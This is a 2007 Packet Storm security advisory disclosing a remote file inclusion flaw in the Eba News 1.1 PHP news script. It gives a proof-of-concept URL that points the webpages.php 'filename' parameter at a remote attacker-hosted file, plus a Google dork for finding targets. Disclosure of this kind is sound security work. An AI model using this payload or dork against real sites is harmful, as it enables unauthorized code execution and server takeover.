ebanews-rfi.txt

2007-04-23T00:00:00
ID PACKETSTORM:56133
Type packetstorm
Reporter SekoMirza
Modified 2007-04-23T00:00:00

Description

                                        
                                            `--------------------------------------------------  
Eba News Version : v1.1 <= (webpages.php) Remote File Include   
--------------------------------------------------  
  
Author : SekoMirza  
Date Found : Nisan 11 2007  
Location : Fransa // ...   
Critical Lvl : Highly critical  
Impact : System access  
Where : From Remote  
--------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : Eba News  
version : 1.1  
vendor : http://ebascripts.com/  
source url : http://ebascripts.com/  
--------------------------------------------------  
  
Description:  
~~~~~~~~  
  
EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes.  
  
  
  
--------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~  
  
I found vulnerability script in admin/public/webpages.php  
  
  
Proof Of Concept:  
~~~~~~~~~~~~  
  
eba/admin/public/webpages.php?filename=http://attact.com/colok.txt?  
  
--------------------------------------------------  
  
google d0rk:  
~~~~~~~  
"Eba News"  
  
--------------------------------------------------  
Solution:  
~~~  
- download new version in vendor URL   
  
--------------------------------------------------  
Shoutz:  
~~  
~ My Sweet -> Caramel   
~ For Mp3s -> Hypn0sis  
~ For Support -> www.starhack.org  
~ My Bro -> PhantomOrchid  
~ My Preceptor -> Earnk Kazno  
  
  
--------------------------------------------------  
  
Contact:  
~~~  
  
Seko[at]se-ko[dot]info  
  
-------------------------------- [ EOF ]----------  
  
`